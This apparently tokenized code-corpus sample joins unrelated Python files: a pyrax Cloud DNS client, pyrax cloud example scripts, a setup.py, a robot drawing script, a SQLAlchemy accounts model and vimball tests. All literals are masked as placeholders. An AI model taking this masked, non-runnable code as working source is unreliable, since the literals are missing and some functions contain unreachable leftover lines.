<EOL> from tests . unit import fakes <EOL> server_types = ( pyrax . CloudServer , fakes . FakeServer ) <EOL> lb_types = ( CloudLoadBalancer , fakes . FakeLoadBalancer , <EOL> fakes . FakeDNSDevice ) <EOL> except ImportError : <EOL> server_types = ( pyrax . CloudServer , ) <EOL> lb_types = ( CloudLoadBalancer , ) <EOL> if isinstance ( device , server_types ) : <EOL> device_type = "<STR_LIT>" <EOL> elif isinstance ( device , lb_types ) : <EOL> device_type = "<STR_LIT>" <EOL> else : <EOL> raise exc . InvalidDeviceType ( "<STR_LIT>" <EOL> "<STR_LIT>" % device ) <EOL> return device_type <EOL> def list_ptr_records ( self , device ) : <EOL> """<STR_LIT>""" <EOL> device_type = self . _resolve_device_type ( device ) <EOL> href , svc_name = self . _get_ptr_details ( device , device_type ) <EOL> uri = "<STR_LIT>" % ( svc_name , href ) <EOL> try : <EOL> resp , resp_body = self . _retry_get ( uri ) <EOL> except exc . NotFound : <EOL> return [ ] <EOL> records = [ CloudDNSPTRRecord ( rec , device ) <EOL> for rec in resp_body . get ( "<STR_LIT>" , [ ] ) ] <EOL> return records <EOL> def add_ptr_records ( self , device , records ) : <EOL> """<STR_LIT>""" <EOL> device_type = self . _resolve_device_type ( device ) <EOL> href , svc_name = self . _get_ptr_details ( device , device_type ) <EOL> if not isinstance ( records , ( list , tuple ) ) : <EOL> records = [ records ] <EOL> body = { "<STR_LIT>" : { <EOL> "<STR_LIT>" : records } , <EOL> "<STR_LIT>" : { <EOL> "<STR_LIT:content>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : href , <EOL> "<STR_LIT>" : svc_name , <EOL> } } <EOL> uri = "<STR_LIT>" <EOL> try : <EOL> resp , resp_body = self . _async_call ( uri , body = body , method = "<STR_LIT:POST>" , <EOL> error_class = exc . PTRRecordCreationFailed ) <EOL> except exc . EndpointNotFound : <EOL> raise exc . InvalidPTRRecord ( "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> return resp_body . get ( "<STR_LIT>" ) <EOL> records = [ CloudDNSPTRRecord ( rec , device ) <EOL> for rec in resp_body . get ( "<STR_LIT>" , [ ] ) ] <EOL> return records <EOL> def update_ptr_record ( self , device , record , domain_name , data = None , <EOL> ttl = None , comment = None ) : <EOL> """<STR_LIT>""" <EOL> device_type = self . _resolve_device_type ( device ) <EOL> href , svc_name = self . _get_ptr_details ( device , device_type ) <EOL> try : <EOL> rec_id = record . id <EOL> except AttributeError : <EOL> rec_id = record <EOL> rec = { "<STR_LIT:name>" : domain_name , <EOL> "<STR_LIT:id>" : rec_id , <EOL> "<STR_LIT:type>" : "<STR_LIT>" , <EOL> "<STR_LIT:data>" : data , <EOL> } <EOL> if ttl is not None : <EOL> rec [ "<STR_LIT>" ] = max ( <NUM_LIT> , ttl ) <EOL> if comment is not None : <EOL> rec [ "<STR_LIT>" ] = comment [ : <NUM_LIT> ] <EOL> body = { "<STR_LIT>" : { <EOL> "<STR_LIT>" : [ rec ] } , <EOL> "<STR_LIT>" : { <EOL> "<STR_LIT:content>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : href , <EOL> "<STR_LIT>" : svc_name , <EOL> } } <EOL> uri = "<STR_LIT>" <EOL> try : <EOL> resp , resp_body = self . _async_call ( uri , body = body , method = "<STR_LIT>" , <EOL> has_response = False , error_class = exc . PTRRecordUpdateFailed ) <EOL> except exc . EndpointNotFound as e : <EOL> raise exc . InvalidPTRRecord ( "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> return resp_body . get ( "<STR_LIT:status>" ) == "<STR_LIT>" <EOL> def delete_ptr_records ( self , device , ip_address = None ) : <EOL> """<STR_LIT>""" <EOL> device_type = self . _resolve_device_type ( device ) <EOL> href , svc_name = self . _get_ptr_details ( device , device_type ) <EOL> uri = "<STR_LIT>" % ( svc_name , href ) <EOL> if ip_address : <EOL> uri = "<STR_LIT>" % ( uri , ip_address ) <EOL> resp , resp_body = self . _async_call ( uri , method = "<STR_LIT>" , <EOL> has_response = False , <EOL> error_class = exc . PTRRecordDeletionFailed ) <EOL> return resp_body . get ( "<STR_LIT:status>" ) == "<STR_LIT>" <EOL> class CloudDNSClient ( BaseClient ) : <EOL> """<STR_LIT>""" <EOL> name = "<STR_LIT>" <EOL> def _configure_manager ( self ) : <EOL> """<STR_LIT>""" <EOL> self . _manager = CloudDNSManager ( self , resource_class = CloudDNSDomain , <EOL> response_key = "<STR_LIT>" , plural_response_key = "<STR_LIT>" , <EOL> uri_base = "<STR_LIT>" ) <EOL> def method_get ( self , uri , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> for i in six . moves . range ( <NUM_LIT:3> ) : <EOL> resp , body = super ( CloudDNSClient , self ) . method_get ( uri , ** kwargs ) <EOL> if body : <EOL> return resp , body <EOL> raise exc . ServiceResponseFailure ( "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> def set_timeout ( self , timeout ) : <EOL> """<STR_LIT>""" <EOL> self . _manager . _set_timeout ( timeout ) <EOL> def set_delay ( self , delay ) : <EOL> """<STR_LIT>""" <EOL> self . _manager . _set_delay ( delay ) <EOL> def list ( self , limit = None , offset = None ) : <EOL> """<STR_LIT>""" <EOL> return self . _manager . list ( limit = limit , offset = offset ) <EOL> def list_previous_page ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . _manager . list_previous_page ( ) <EOL> def list_next_page ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . _manager . list_next_page ( ) <EOL> def get_domain_iterator ( self ) : <EOL> """<STR_LIT>""" <EOL> return DomainResultsIterator ( self . _manager ) <EOL> @ assure_domain <EOL> def changes_since ( self , domain , date_or_datetime ) : <EOL> """<STR_LIT>""" <EOL> return domain . changes_since ( date_or_datetime ) <EOL> @ assure_domain <EOL> def export_domain ( self , domain ) : <EOL> """<STR_LIT>""" <EOL> return domain . export ( ) <EOL> def import_domain ( self , domain_data ) : <EOL> """<STR_LIT>""" <EOL> return self . _manager . import_domain ( domain_data ) <EOL> @ assure_domain <EOL> def update_domain ( self , domain , emailAddress = None , ttl = None , comment = None ) : <EOL> """<STR_LIT>""" <EOL> return domain . update ( emailAddress = emailAddress , <EOL> ttl = ttl , comment = comment ) <EOL> @ assure_domain <EOL> def delete ( self , domain , delete_subdomains = False ) : <EOL> """<STR_LIT>""" <EOL> domain . delete ( delete_subdomains = delete_subdomains ) <EOL> @ assure_domain <EOL> def list_subdomains ( self , domain , limit = None , offset = None ) : <EOL> """<STR_LIT>""" <EOL> return domain . list_subdomains ( limit = limit , offset = offset ) <EOL> def get_subdomain_iterator ( self , domain , limit = None , offset = None ) : <EOL> """<STR_LIT>""" <EOL> return SubdomainResultsIterator ( self . _manager , domain = domain ) <EOL> def list_subdomains_previous_page ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . _manager . list_subdomains_previous_page ( ) <EOL> def list_subdomains_next_page ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . _manager . list_subdomains_next_page ( ) <EOL> @ assure_domain <EOL> def list_records ( self , domain , limit = None , offset = None ) : <EOL> """<STR_LIT>""" <EOL> return domain . list_records ( limit = limit , offset = offset ) <EOL> def get_record_iterator ( self , domain ) : <EOL> """<STR_LIT>""" <EOL> return RecordResultsIterator ( self . _manager , domain = domain ) <EOL> def list_records_previous_page ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . _manager . list_records_previous_page ( ) <EOL> def list_records_next_page ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . _manager . list_records_next_page ( ) <EOL> @ assure_domain <EOL> def search_records ( self , domain , record_type , name = None , data = None ) : <EOL> """<STR_LIT>""" <EOL> return domain . search_records ( record_type = record_type , <EOL> name = name , data = data ) <EOL> @ assure_domain <EOL> def find_record ( self , domain , record_type , name = None , data = None ) : <EOL> """<STR_LIT>""" <EOL> return domain . find_record ( record_type = record_type , <EOL> name = name , data = data ) <EOL> @ assure_domain <EOL> def add_records ( self , domain , records ) : <EOL> """<STR_LIT>""" <EOL> return domain . add_records ( records ) <EOL> add_record = add_records <EOL> @ assure_domain <EOL> def get_record ( self , domain , record ) : <EOL> """<STR_LIT>""" <EOL> return domain . get_record ( record ) <EOL> @ assure_domain <EOL> def update_record ( self , domain , record , data = None , priority = None , ttl = None , <EOL> comment = None ) : <EOL> """<STR_LIT>""" <EOL> return domain . update_record ( record , data = data , priority = priority , <EOL> ttl = ttl , comment = comment ) <EOL> @ assure_domain <EOL> def update_records ( self , domain , records ) : <EOL> """<STR_LIT>""" <EOL> return domain . update_records ( records ) <EOL> @ assure_domain <EOL> def delete_record ( self , domain , record ) : <EOL> """<STR_LIT>""" <EOL> return domain . delete_record ( record ) <EOL> def list_ptr_records ( self , device ) : <EOL> """<STR_LIT>""" <EOL> return self . _manager . list_ptr_records ( device ) <EOL> def add_ptr_records ( self , device , records ) : <EOL> """<STR_LIT>""" <EOL> return self . _manager . add_ptr_records ( device , records ) <EOL> def update_ptr_record ( self , device , record , domain_name , data = None , <EOL> ttl = None , comment = None ) : <EOL> """<STR_LIT>""" <EOL> return self . _manager . update_ptr_record ( device , record , domain_name , <EOL> data = data , ttl = ttl , comment = comment ) <EOL> def delete_ptr_records ( self , device , ip_address = None ) : <EOL> """<STR_LIT>""" <EOL> return self . _manager . delete_ptr_records ( device , ip_address = ip_address ) <EOL> def get_absolute_limits ( self ) : <EOL> """<STR_LIT>""" <EOL> resp , body = self . method_get ( "<STR_LIT>" ) <EOL> absolute_limits = body . get ( "<STR_LIT>" , { } ) . get ( "<STR_LIT>" ) <EOL> return absolute_limits <EOL> def get_rate_limits ( self ) : <EOL> """<STR_LIT>""" <EOL> resp , body = self . method_get ( "<STR_LIT>" ) <EOL> rate_limits = body . get ( "<STR_LIT>" , { } ) . get ( "<STR_LIT>" ) <EOL> ret = [ ] <EOL> for rate_limit in rate_limits : <EOL> limits = rate_limit [ "<STR_LIT>" ] <EOL> uri_limits = { "<STR_LIT>" : rate_limit [ "<STR_LIT>" ] , <EOL> "<STR_LIT>" : limits } <EOL> ret . append ( uri_limits ) <EOL> return ret <EOL> class ResultsIterator ( object ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , manager , domain = None ) : <EOL> self . manager = manager <EOL> self . domain = domain <EOL> self . domain_id = utils . get_id ( domain ) if domain else None <EOL> self . results = [ ] <EOL> self . next_uri = "<STR_LIT>" <EOL> self . extra_args = tuple ( ) <EOL> self . _init_methods ( ) <EOL> def _init_methods ( self ) : <EOL> """<STR_LIT>""" <EOL> raise NotImplementedError ( ) <EOL> def __iter__ ( self ) : <EOL> return self <EOL> def next ( self ) : <EOL> """<STR_LIT>""" <EOL> try : <EOL> return self . results . pop ( <NUM_LIT:0> ) <EOL> except IndexError : <EOL> if self . next_uri is None : <EOL> raise StopIteration ( ) <EOL> else : <EOL> if not self . next_uri : <EOL> if self . domain : <EOL> self . results = self . list_method ( self . domain ) <EOL> else : <EOL> self . results = self . list_method ( ) <EOL> else : <EOL> args = self . extra_args <EOL> self . results = self . _list_method ( self . next_uri , * args ) <EOL> self . next_uri = self . manager . _paging . get ( <EOL> self . paging_service , { } ) . get ( "<STR_LIT>" ) <EOL> try : <EOL> return self . results . pop ( <NUM_LIT:0> ) <EOL> except IndexError : <EOL> raise StopIteration ( ) <EOL> class DomainResultsIterator ( ResultsIterator ) : <EOL> """<STR_LIT>""" <EOL> def _init_methods ( self ) : <EOL> self . list_method = self . manager . list <EOL> self . _list_method = self . manager . _list <EOL> self . paging_service = "<STR_LIT>" <EOL> class SubdomainResultsIterator ( ResultsIterator ) : <EOL> """<STR_LIT>""" <EOL> def _init_methods ( self ) : <EOL> self . list_method = self . manager . list_subdomains <EOL> self . _list_method = self . manager . _list_subdomains <EOL> self . extra_args = ( self . domain_id , ) <EOL> self . paging_service = "<STR_LIT>" <EOL> class RecordResultsIterator ( ResultsIterator ) : <EOL> """<STR_LIT>""" <EOL> def _init_methods ( self ) : <EOL> self . list_method = self . manager . list_records <EOL> self . _list_method = self . manager . _list_records <EOL> self . paging_service = "<STR_LIT>" </s>
<s> from __future__ import print_function <EOL> import os <EOL> import six <EOL> import sys <EOL> import pyrax <EOL> pyrax . set_setting ( "<STR_LIT>" , "<STR_LIT>" ) <EOL> creds_file = os . path . expanduser ( "<STR_LIT>" ) <EOL> pyrax . set_credential_file ( creds_file ) <EOL> cs = pyrax . cloudservers <EOL> cbs = pyrax . cloud_blockstorage <EOL> try : <EOL> server = cs . servers . find ( name = "<STR_LIT>" ) <EOL> except cs . exceptions . NotFound as e : <EOL> print ( ) <EOL> print ( "<STR_LIT>" ) <EOL> print ( "<STR_LIT>" ) <EOL> prompt = "<STR_LIT>" <EOL> answer = six . moves . input ( prompt ) <EOL> if answer . lower ( ) . startswith ( "<STR_LIT:y>" ) : <EOL> ubu_image = [ img for img in cs . images . list ( ) <EOL> if "<STR_LIT>" in img . name ] [ <NUM_LIT:0> ] <EOL> flavor_1GB = [ flavor for flavor in cs . flavors . list ( ) <EOL> if flavor . ram == <NUM_LIT> ] [ <NUM_LIT:0> ] <EOL> print ( "<STR_LIT>" ) <EOL> server = cs . servers . create ( "<STR_LIT>" , ubu_image . id , flavor_1GB . id ) <EOL> print ( "<STR_LIT>" ) <EOL> pyrax . utils . wait_until ( server , "<STR_LIT:status>" , "<STR_LIT>" , attempts = <NUM_LIT:0> , <EOL> verbose = True ) <EOL> else : <EOL> sys . exit ( ) <EOL> vol = cbs . create ( name = "<STR_LIT>" , size = <NUM_LIT:100> , volume_type = "<STR_LIT>" ) <EOL> print ( "<STR_LIT>" , vol . name ) <EOL> print ( "<STR_LIT>" , server ) <EOL> print ( "<STR_LIT>" ) <EOL> vol . attach_to_instance ( server , mountpoint = "<STR_LIT>" ) <EOL> pyrax . utils . wait_until ( vol , "<STR_LIT:status>" , "<STR_LIT>" , interval = <NUM_LIT:3> , attempts = <NUM_LIT:0> , <EOL> verbose = True ) <EOL> print ( "<STR_LIT>" , vol . attachments ) <EOL> print ( ) <EOL> print ( "<STR_LIT>" ) <EOL> vol . detach ( ) <EOL> pyrax . utils . wait_until ( vol , "<STR_LIT:status>" , "<STR_LIT>" , interval = <NUM_LIT:3> , attempts = <NUM_LIT:0> , <EOL> verbose = True ) <EOL> print ( "<STR_LIT>" , vol . attachments ) <EOL> vol . delete ( ) <EOL> print ( "<STR_LIT>" ) </s>
<s> from __future__ import print_function <EOL> import os <EOL> import pyrax <EOL> pyrax . set_setting ( "<STR_LIT>" , "<STR_LIT>" ) <EOL> creds_file = os . path . expanduser ( "<STR_LIT>" ) <EOL> pyrax . set_credential_file ( creds_file ) <EOL> clb = pyrax . cloud_loadbalancers <EOL> node = clb . Node ( address = "<STR_LIT>" , port = <NUM_LIT> , condition = "<STR_LIT>" ) <EOL> print ( "<STR_LIT>" , node <EOL> ) <EOL> node_default = clb . Node ( address = "<STR_LIT>" , port = <NUM_LIT> ) <EOL> print ( "<STR_LIT>" , node_default ) </s>
<s> from __future__ import print_function <EOL> import os <EOL> import pyrax <EOL> import pyrax . exceptions as exc <EOL> import pyrax . utils as utils <EOL> pyrax . set_setting ( "<STR_LIT>" , "<STR_LIT>" ) <EOL> creds_file = os . path . expanduser ( "<STR_LIT>" ) <EOL> pyrax . set_credential_file ( creds_file ) <EOL> cf = pyrax . cloudfiles <EOL> cont_name = pyrax . utils . random_ascii ( <NUM_LIT:8> ) <EOL> cont = cf . create_container ( cont_name ) <EOL> text = """<STR_LIT>""" <EOL> with utils . SelfDeletingTempfile ( ) as tmpname : <EOL> print ( "<STR_LIT>" ) <EOL> print ( "<STR_LIT:->" * <NUM_LIT> ) <EOL> print ( text ) <EOL> print ( "<STR_LIT:->" * <NUM_LIT> ) <EOL> with open ( tmpname , "<STR_LIT:w>" ) as tmp : <EOL> tmp . write ( text ) <EOL> nm = os . path . basename ( tmpname ) <EOL> print ( ) <EOL> print ( "<STR_LIT>" % nm ) <EOL> cf . upload_file ( cont , tmpname , content_type = "<STR_LIT>" ) <EOL> obj = cont . get_object ( nm ) <EOL> print ( ) <EOL> print ( "<STR_LIT>" , obj ) <EOL> print ( "<STR_LIT>" ) <EOL> print ( "<STR_LIT:->" * <NUM_LIT> ) <EOL> print ( obj . get ( ) ) <EOL> print ( "<STR_LIT:->" * <NUM_LIT> <EOL> ) <EOL> cont . delete ( True ) </s>
<s> from setuptools import setup <EOL> from setuptools . command . sdist import sdist as _sdist <EOL> import re <EOL> import sys <EOL> import time <EOL> import codecs <EOL> import subprocess <EOL> if sys . version < "<STR_LIT>" : <EOL> from distutils . dist import DistributionMetadata <EOL> DistributionMetadata . classifiers = None <EOL> DistributionMetadata . download_url = None <EOL> with open ( "<STR_LIT>" , "<STR_LIT>" ) as vfile : <EOL> version_text = vfile . read ( ) <EOL> vmatch = re . search ( r'<STR_LIT>' , version_text ) <EOL> version = vmatch . groups ( ) [ <NUM_LIT:0> ] <EOL> release = '<STR_LIT:0>' <EOL> class sdist ( _sdist ) : <EOL> """<STR_LIT>""" <EOL> def run ( self ) : <EOL> global version <EOL> global release <EOL> git_head = subprocess . Popen ( "<STR_LIT>" , <EOL> shell = True , <EOL> stdout = subprocess . PIPE ) . communicate ( ) [ <NUM_LIT:0> ] . strip ( ) <EOL> date = time . strftime ( "<STR_LIT>" , time . gmtime ( ) ) <EOL> git_release = "<STR_LIT>" % ( date , git_head ) <EOL> spec_in = open ( '<STR_LIT>' , '<STR_LIT:r>' ) <EOL> spec = open ( '<STR_LIT>' , '<STR_LIT:w>' ) <EOL> for line in spec_in . xreadlines ( ) : <EOL> if "<STR_LIT>" in line : <EOL> line = line . replace ( "<STR_LIT>" , version ) <EOL> elif "<STR_LIT>" in line : <EOL> if release . startswith ( '<STR_LIT:0>' ) : <EOL> release += '<STR_LIT:.>' + git_release <EOL> line = line . replace ( "<STR_LIT>" , release ) <EOL> spec . write ( line ) <EOL> spec_in . close ( ) <EOL> spec . close ( ) <EOL> _sdist . run ( self ) <EOL> try : <EOL> f = codecs . open ( '<STR_LIT>' , encoding = '<STR_LIT:utf-8>' ) <EOL> long_description = f . read ( ) <EOL> f . close ( ) <EOL> except : <EOL> long_description = '<STR_LIT>' <EOL> testing_requires = [ "<STR_LIT>" ] <EOL> setup ( <EOL> name = "<STR_LIT>" , <EOL> version = version , <EOL> description = "<STR_LIT>" , <EOL> long_description = long_description , <EOL> author = "<STR_LIT>" , <EOL> url = "<STR_LIT>" , <EOL> license = '<STR_LIT>' , <EOL> keywords = "<STR_LIT>" , <EOL> classifiers = [ <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> ] , <EOL> install_requires = [ <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> ] + testing_requires , <EOL> packages = [ <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> ] , <EOL> cmdclass = { '<STR_LIT>' : sdist } <EOL> ) </s>
<s> from __future__ import print_function <EOL> from sparki_learning import * <EOL> import math <EOL> init ( "<STR_LIT>" ) <EOL> print ( "<STR_LIT>" ) <EOL> setPosition ( - <NUM_LIT:5> , <NUM_LIT> ) <EOL> drawFunction ( lambda x : x ** <NUM_LIT:2> , flrange ( - <NUM_LIT:5> , <NUM_LIT> , <NUM_LIT> ) ) <EOL> print ( "<STR_LIT>" ) <EOL> setPosition ( <NUM_LIT> , <NUM_LIT:0> ) <EOL> drawFunction ( lambda x : math . sin ( x ) , flrange ( <NUM_LIT> , - <NUM_LIT> , - <NUM_LIT> ) , <NUM_LIT:5> ) </s>
<s> from sqlalchemy import Column , ForeignKey , Integer , Float , String <EOL> from sqlalchemy . sql . expression import asc , desc , or_ , and_ <EOL> from sqlalchemy . orm import aliased <EOL> from db . database import db_session <EOL> from db . database import Base <EOL> from models . users import UsersTable <EOL> from utils import * <EOL> class Accounts ( object ) : <EOL> object = None <EOL> def __init__ ( self , user_id , user_type = None ) : <EOL> if not user_type : <EOL> user_type = '<STR_LIT>' if UsersTable . query . filter ( and_ ( UsersTable . id == user_id , UsersTable . is_private == True ) ) . first ( ) else '<STR_LIT>' <EOL> if user_type == '<STR_LIT>' : <EOL> self . object = NormalUserAccounts ( user_id ) <EOL> else : <EOL> self . object = PrivateUserAccounts ( user_id ) <EOL> def __getattr__ ( self , name ) : <EOL> print "<STR_LIT>" , name , '<STR_LIT>' , self . object <EOL> return getattr ( self . object , name ) <EOL> class AccountsBase ( ) : <EOL> user_id = None <EOL> accounts = None <EOL> accounts_and_loans = None <EOL> transfers = None <EOL> alias1 = None <EOL> alias2 = None <EOL> transfer = None <EOL> def __init__ ( self , user_id ) : <EOL> self . user_id = user_id <EOL> def get_accounts ( self ) : <EOL> if not self . accounts : <EOL> self . accounts = AccountsTable . query . filter ( AccountsTable . user == self . user_id ) . filter ( AccountsTable . type != "<STR_LIT>" ) . order_by ( asc ( AccountsTable . type ) ) . order_by ( asc ( AccountsTable . id ) ) <EOL> return self . accounts <EOL> def get_accounts_and_loans ( self ) : <EOL> if not self . accounts_and_loans : <EOL> self . accounts_and_loans = AccountsTable . query . filter ( AccountsTable . user == self . user_id ) . filter ( AccountsTable . balance != <NUM_LIT:0> ) . outerjoin ( ( UsersTable , AccountsTable . name == UsersTable . id ) ) . add_columns ( UsersTable . name , UsersTable . slug ) . order_by ( asc ( AccountsTable . type ) ) . order_by ( asc ( AccountsTable . id ) ) <EOL> return self . accounts_and_loans <EOL> def change_account_balance ( self , account_id , amount ) : <EOL> a = AccountsTable . query . filter ( AccountsTable . id == account_id ) . first ( ) <EOL> if a : <EOL> a . balance = float ( amount ) <EOL> db_session . add ( a ) <EOL> db_session . commit ( ) <EOL> def modify_account_balance ( self , account_id , amount ) : <EOL> a = AccountsTable . query . filter ( AccountsTable . id == account_id ) . first ( ) <EOL> if a : <EOL> a . balance += float ( amount ) <EOL> db_session . add ( a ) <EOL> db_session . commit ( ) <EOL> def modify_user_balance ( self , amount , account_id = None ) : <EOL> if not account_id : <EOL> a = AccountsTable . query . filter ( AccountsTable . user == self . user_id ) . filter ( AccountsTable . type != "<STR_LIT>" ) . order_by ( asc ( AccountsTable . id ) ) . first ( ) <EOL> else : <EOL> a = AccountsTable . query . filter ( AccountsTable . user == self . user_id ) . filter ( AccountsTable . id == account_id ) . first ( ) <EOL> if a : <EOL> a . balance += float ( amount ) <EOL> db_session . add ( a ) <EOL> db_session . commit ( ) <EOL> def modify_loan_balance ( self , amount , with_user_id ) : <EOL> a = AccountsTable . query . filter ( AccountsTable . user == self . user_id ) . filter ( AccountsTable . type == "<STR_LIT>" ) . filter ( AccountsTable . name == with_user_id ) . first ( ) <EOL> if not a : <EOL> a = AccountsTable ( self . user_id , with_user_id , '<STR_LIT>' , float ( amount ) ) <EOL> else : <EOL> a . balance += float ( amount ) <EOL> db_session . add ( a ) <EOL> db_session . commit ( ) <EOL> def get_default_account ( self ) : <EOL> a = AccountsTable . query . filter ( AccountsTable . user == self . user_id ) . order_by ( asc ( AccountsTable . id ) ) . first ( ) <EOL> if a : return a . id <EOL> def add_default_account ( self ) : <EOL> a = AccountsTable ( self . user_id , "<STR_LIT>" , '<STR_LIT:default>' , <NUM_LIT:0> ) <EOL> db_session . add ( a ) <EOL> db_session . commit ( ) <EOL> return a . id <EOL> def add_account ( self , name , type , balance ) : <EOL> a = AccountsTable ( self . user_id , name , type , balance ) <EOL> db_session . add ( a ) <EOL> db_session . commit ( ) <EOL> def is_account ( self , account_id = None , account_slug = None ) : <EOL> accounts = self . get_accounts ( ) <EOL> if account_id : <EOL> for acc in accounts : <EOL> if acc . id == int ( account_id ) : <EOL> return acc . id <EOL> elif account_slug : <EOL> for acc in accounts : <EOL> if acc . slug == account_slug : <EOL> return acc . id <EOL> def add_account_transfer ( self , date , deduct_from_account , credit_to_account , amount ) : <EOL> t = AccountTransfersTable ( self . user_id , date , deduct_from_account , credit_to_account , amount ) <EOL> db_session . add ( t ) <EOL> db_session . commit ( ) <EOL> def edit_account_transfer ( self , date , deduct_from_account , credit_to_account , amount , transfer_id ) : <EOL> t = self . get_transfer ( transfer_id ) <EOL> if t : <EOL> t . date , t . from_account , t . to_account , t . amount = date , deduct_from_account , credit_to_account , amount <EOL> db_session . add ( t ) <EOL> db_session . commit ( ) <EOL> return t <EOL> def get_account_transfers ( self , date_from = None , date_to = None , account_slug = None ) : <EOL> if not self . transfers : <EOL> self . alias1 , self . alias2 = aliased ( AccountsTable ) , aliased ( AccountsTable ) <EOL> self . transfers = AccountTransfersTable . query . filter ( AccountTransfersTable . user == self . user_id ) . order_by ( desc ( AccountTransfersTable . date ) ) . order_by ( desc ( AccountTransfersTable . id ) ) . join ( <EOL> ( self . alias1 , ( AccountTransfersTable . from_account == self . alias1 . id ) ) , ( self . alias2 , ( AccountTransfersTable . to_account == self . alias2 . id ) ) ) . add_columns ( self . alias1 . name , self . alias1 . slug , self . alias2 . name , self . alias2 . slug ) <EOL> if date_from and date_to : <EOL> self . transfers = self . transfers . filter ( AccountTransfersTable . date >= date_from ) . filter ( AccountTransfersTable . date <= date_to ) <EOL> if account_slug : <EOL> self . transfers = self . transfers . filter ( or_ ( self . alias1 . slug == account_slug , self . alias2 . slug == account_slug ) ) <EOL> return self . transfers <EOL> def get_transfer ( self , transfer_id ) : <EOL> if not self . transfer or self . transfer . id != transfer_id : <EOL> self . transfer = AccountTransfersTable . query . filter ( and_ ( AccountTransfersTable . user == self . user_id , AccountTransfersTable . id == transfer_id ) ) . first ( ) <EOL> return self . transfer <EOL> def delete_transfer ( self , transfer_id ) : <EOL> AccountTransfersTable . query . filter ( and_ ( AccountTransfersTable . user == self . user_id , AccountTransfersTable . id == transfer_id ) ) . delete ( ) <EOL> db_session . commit ( ) <EOL> class NormalUserAccounts ( AccountsBase ) : <EOL> pass <EOL> class PrivateUserAccounts ( AccountsBase ) : <EOL> def modify_loan_balance ( self , amount , with_user_id ) : <EOL> return None <EOL> class AccountsTable ( Base ) : <EOL> """<STR_LIT>""" <EOL> __tablename__ = '<STR_LIT>' <EOL> id = Column ( Integer , primary_key = True ) <EOL> user = Column ( '<STR_LIT>' , Integer , ForeignKey ( '<STR_LIT>' ) ) <EOL> name = Column ( String ( <NUM_LIT:100> ) ) <EOL> type = Column ( String ( <NUM_LIT:100> ) ) <EOL> balance = Column ( Float ( precision = <NUM_LIT:2> ) ) <EOL> slug = Column ( String ( <NUM_LIT:100> ) ) <EOL> def __init__ ( self , user = None , name = None , type = None , balance = None ) : <EOL> self . user = user <EOL> self . name = name <EOL> self . type = type <EOL> self . balance = balance <EOL> self . slug = slugify ( name ) if type == '<STR_LIT>' or type == '<STR_LIT>' else None <EOL> class AccountTransfersTable ( Base ) : <EOL> """<STR_LIT>""" <EOL> __tablename__ = '<STR_LIT>' <EOL> id = Column ( Integer , primary_key = True ) <EOL> user = Column ( '<STR_LIT>' , Integer , ForeignKey ( '<STR_LIT>' ) ) <EOL> date = Column ( Integer ) <EOL> from_account = Column ( '<STR_LIT>' , Integer , ForeignKey ( '<STR_LIT>' ) ) <EOL> to_account = Column ( '<STR_LIT>' , Integer , ForeignKey ( '<STR_LIT>' ) ) <EOL> amount = Column ( Float ( precision = <NUM_LIT:2> ) ) <EOL> def __init__ ( self , user = None , date = None , from_account = None , to_account = None , amount = None ) : <EOL> self . user = user <EOL> self . date = date <EOL> self . from_account = from_account <EOL> self . to_account = to_account <EOL> self . amount = amount </s>
<s> import os <EOL> import stat <EOL> from tempfile import NamedTemporaryFile , TemporaryDirectory <EOL> from unittest . mock import patch <EOL> from pytest import raises <EOL> from vimball . base import Vimball , mkdir_p , is_vimball , ArchiveError <EOL> def test_mkdir_p ( ) : <EOL> with TemporaryDirectory ( ) as tmpdir : <EOL> for path in ( '<STR_LIT>' , '<STR_LIT>' ) : <EOL> new_path = os . path . join ( tmpdir , path ) <EOL> assert not os . path . exists ( new_path ) <EOL> mkdir_p ( new_path ) <EOL> assert os . path . isdir ( new_path ) <EOL> with TemporaryDirectory ( ) as tmpdir : <EOL> new_path = os . path . join ( tmpdir , '<STR_LIT>' ) <EOL> os . mkdir ( new_path ) <EOL> assert os . path . isdir ( new_path ) <EOL> mkdir_p ( new_path ) <EOL> assert os . path . isdir ( new_path ) <EOL> with TemporaryDirectory ( ) as tmpdir : <EOL> path = os . path . join ( tmpdir , '<STR_LIT>' ) <EOL> os . mkdir ( path ) <EOL> os . chmod ( path , stat . S_IREAD ) <EOL> with raises ( OSError ) : <EOL> new_path = os . path . join ( path , '<STR_LIT>' ) <EOL> mkdir_p ( new_path ) <EOL> with NamedTemporaryFile ( ) as tmpfile : <EOL> with raises ( OSError ) : <EOL> mkdir_p ( tmpfile . name ) <EOL> def is_vimball ( ) : <EOL> with NamedTemporaryFile ( ) as tmpfile : <EOL> tmpfile . write ( b'<STR_LIT>' ) <EOL> tmpfile . flush ( ) <EOL> assert not is_vimball ( tmpfile . name ) <EOL> with NamedTemporaryFile ( ) as tmpfile : <EOL> tmpfile . write ( '<STR_LIT>' ) <EOL> tmpfile . flush ( ) <EOL> assert is_vimball ( tmpfile . name ) <EOL> def test_vimball ( ) : <EOL> with raises ( ArchiveError ) : <EOL> Vimball ( '<STR_LIT>' ) <EOL> with NamedTemporaryFile ( ) as tmpfile : <EOL> tmpfile . write ( b'<STR_LIT>' ) <EOL> with raises ( ArchiveError ) : <EOL> Vimball ( tmpfile . name ) <EOL> with NamedTemporaryFile ( mode = '<STR_LIT>' ) as tmpfile : <EOL> filename = os . path . basename ( tmpfile . name ) <EOL> tmpfile . write ( '<STR_LIT>' ) <EOL> tmpfile . flush ( ) <EOL> v = Vimball ( tmpfile . name ) <EOL> assert list ( v . files ) == [ ] 